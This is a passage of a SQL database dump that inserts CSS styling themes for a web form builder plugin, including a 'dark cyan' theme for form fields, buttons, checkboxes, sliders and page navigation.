inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n.button-submit {\r\nbackground: #811919;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #9E1919;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #811818;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/02/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #fff;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\ncolor: #555;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #640B0B;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #942323;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #752D2D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #9A0B0B  0%, #7B2828 39%, #752D2D 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #9A0B0B ), color-stop(39%, #7B2828 ), color-stop(100%, #752D2D )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height:18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/02/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(11, 'Theme 03 dark cyan', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #0B7A97;\r\nmargin-bottom: 10px;\r\ncolor: #0B7A97;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #2796B3 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/03/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n.button-submit {\r\nbackground: #0B7A97;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #18627C;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #56B4D5;\r\nfont-family: Segoe UI;\r\n}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/03/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\ncolor: #555;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: 